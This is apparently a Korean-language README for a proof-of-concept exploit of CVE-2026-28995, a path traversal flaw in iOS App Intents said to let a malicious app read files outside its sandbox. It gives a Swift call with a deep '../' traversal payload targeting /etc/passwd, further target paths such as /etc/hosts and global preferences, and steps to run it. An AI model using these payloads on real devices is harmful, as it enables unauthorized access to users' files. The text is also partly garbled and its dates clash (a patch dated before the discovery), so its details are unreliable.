
# CVE-2026-28995 CVE-2026-28995에 대한 개념 증명 — iOS 26.4.2 이하의 App Intents에서의 경로 탐색 취약점.
CVE-2026-28995에 대한 개념 증명(PoC) — iOS 26.4.2 이하의 App Intents에서 발생하는 경로 탐색 취약점.
이 취약점은 악성 앱이 App Intents를 통해 샌드박스 외부의 모든 파일을 읽을 수 있게 합니다. 근본 원인은 Apple의 App Intents 프레임워크에서 경로 검증이 충분하지 않기 때문입니다.
영향을 받는 버전: iOS 26.4.2 이하
패치된 버전: iOS 26.5 (2026년 5월 11일)
readCve(path: String) -> Stringlet intent = CVE_2026_28995()
let content = intent.readCve(path: "../../../../../../../../../../../../../etc/passwd")
print(content)
경로 읽는 내용 ../../../../../../../../../../../../../etc/passwd 사용자 비밀번호 ../../../../../../../../../../../../../etc/hosts 호스트 파일 ../../../../../../../../../../../../../var/mobile/Library/Preferences/.GlobalPreferences.plist 시스템 환경설정
경로가 디렉터리를 가리키면 함수는 다음을 반환합니다:
[DIRECTORY]
Contents:
file1.txt
file2.jpg
folder/
실행 방법
Xcode에서 iOS 프로젝트를 생성합니다. CVE-2026-28995.swift 파일을 프로젝트에 추가합니다. 대상 경로로 readCve(path:)를 호출합니다. iOS 26.4.2 이하에서 실행합니다.
책임 공개
발견일: 2026년 7월 1일 패치 버전: iOS 26.5 (2026년 5월 11일)